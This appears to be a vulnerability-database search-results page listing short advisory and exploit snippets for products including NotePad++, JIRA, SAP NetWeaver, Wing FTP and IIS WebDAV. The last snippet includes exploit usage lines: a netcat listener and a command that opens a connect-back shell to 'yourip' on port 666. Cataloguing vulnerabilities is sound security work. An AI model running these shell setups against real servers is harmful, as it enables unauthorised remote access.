97 matches found
JVN#39175666: MP Form Mail CGI eCommerce edition vulnerable to code injection
MP Form Mail CGI eCommerce edition provided by futomi Co., Ltd. is a CGI used to send mail from a web form. MP Form Mail CGI eCommerce edition contains a code injection vulnerability. Impact Arbitrary Perl code may be executed on the server where it resides. Solution Update the software Update to...
NotePad++ Buffer Overflow Vulnerability
NotePad++ is an open source editor that runs in the Windows environment and supports multiple programming languages. NotePad++ suffers from a buffer overflow vulnerability that allows remote attackers to exploit the vulnerability to construct malicious files and trick users into parsing them, whi...
ZenTaoPMS (Zendo) Arbitrary File Upload Vulnerability
ZenTaoPMS ZenTao is a home-grown open source project management software. ZenTaoPMS Zendo software has an arbitrary file upload vulnerability , in the windows environment upload module source code of the blacklist filter can be bypassed , allowing attackers to exploit this vulnerability to upload...
Working Resources BadBlue 1.5/1.6 Triple-Dot-Slash Directory Traversal Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/4179/info Working Resources BadBlue is a webserver intended to share various resources and is developed for Microsoft Windows environments. BadBlue is prone to directory traversal attacks. It is possible for a remote...
JIRA Issues Collector Directory Traversal
This module exploits a directory traversal flaw in JIRA 6.0.3. The vulnerability exists in the issues collector code, while handling attachments provided by the user. It can be exploited in Windows environments to get remote code execution. This module has been tested successfully on JIRA 6.0.3...
CVE-2012-5381
Untrusted search path vulnerability in the installation functionality in PHP 5.3.17, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the C:\PHP directory, which may be added to the PATH system environment variable by an...
ActiveScriptRuby 'GRScript18.dll' ActiveX控件DLL装载任意代码执行漏洞
Bugtraq ID: 53011 CVE ID:CVE-2012-1241 ActiveScriptRuby用于把Ruby实现到Windows环境中。 ActiveScriptRuby存在一个安全漏洞,允许恶意用户执行任意代码。 GRScript18.dll存在一个错误,可被利用执行任意Ruby命令,构建恶意WEB页,诱使用户解析可触发此漏洞。 0 ActiveScriptRuby 1.8.7.34 厂商解决方案 用户可联系厂商升级到最新版本: http://www.artonx.org/data/asr/ 或通过执行如下命令注销COM服务: regsvr32 /u...
[DSECRG-11-031] SAP RFC EPS_DELETE_FILE - Authorisation bypass, smbrelay
DSECRG-11-031 SAP RFC EPSDELETEFILE - Authorisation bypass, smbrelay Security vulnerability was founded in sap EPSDELETEFILE RFC function allows attacker to delete files remotely or steal hashes of SAP server account in windows environment using SMBRelay attack. Digital Security Research Group...
SAP RFC EPS_DELETE_FILE — Authorisation bypass, smbrelay
Application: SAP NetWeaver ABAP Versions Affected: SAP NetWeaver ABAP Vendor URL: http://www.sap.com Bugs:Auth bypass, directory traversal, smbrelay Exploits: YES Reported: 15.01.2011 Vendor response: 25.01.2011 Date of Public Advisory: 22.08.2011 Author: Alexey Sintsov Description Security...
Wing FTP Server < 3.6.6 HTTP Request DoS Vulnerability
Wing FTP Server is prone to a denial of service DoS vulnerability. SPDX-FileCopyrightText: 2010 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...
SAP NetWeaver Logviewer - Security Check Bypass
Application: SAP NetWeaver Logviewer Versions Affected: SAP NetWeaver Logviewer 6.30 Vendor URL: http://www.sap.com Bugs: Security Bypass Exploits: YES Reported: 24.06.2010 Vendor response: 25.06.2010 Date of SAP Security Note Published: 12.03.2013 Date of Public Advisory: 13.03.2013 Reference: S...
Wing FTP Server PORT Command DoS Vulnerability
Discovery Date: Nov 14, 2009 Risk: Important Affected Software: Wing FTP Server 3.1.2 Description: There is a Denial of Service DoS vulnerability that exists in Wing FTP Server 3.1.2. The said vulnerability can be exploited by using an invalid parameter for PORT command. When exploited...
CVE-2007-3815
CVE-2007-3815 affects Poslovni informator Republike Slovenije (PIRS) 2007, via a buffer overflow in pirs32.exe in the GUI, allowing a local user to trigger a denial of service and potentially execute arbitrary code by supplying a long search string. Evidence across multiple sources confirms the c...
CVE-2007-3815
Buffer overflow in pirs32.exe in Poslovni informator Republike Slovenije PIRS 2007 allows local users to cause a denial of service application crash and possibly execute arbitrary code via a long search string in certain fields in the GUI. NOTE: this may cross privilege boundaries if PIRS is used...
The Windows environment via the MySQL to the SYSTEM status perform system commands-bug warning-the black bar safety net
Some time ago two about MySQL vulnerabilities in the MySQL CREATE FUNCTION mysql. func table allows injecting arbitrary function library vulnerability, the MySQL CREATE FUNCTION libc library allows arbitrary code execution vulnerabilities of a careful study of these two vulnerabilities, you can...
DameWare Mini Remote Control 4.0 4.9 - Client Agent Remote Overflow
DameWare Mini Remote Control 4.0 4.9 - Client Agent Remote Overflow / / / / / / / / \ / / // / / / / // // / / / .// //// ///====================== DameWare Mini Remote Control Client Agent Service Another Pre-Authentication Buffer Overflow By Jackson Pollocks No5 www.jpno5.com Summary...
Microsoft IIS - WebDAV ntdll.dll Remote Overflow
Microsoft IIS - WebDAV ntdll.dll Remote Overflow // / Crpt ntdll.dll exploit trough WebDAV by kralor Crpt / / --------------------------------------------------------------- / / this is the exploit for ntdll.dll through WebDAV. / / run a netcat ex: nc -L -vv -p 666 / / wb server.com yourip 666 0 ...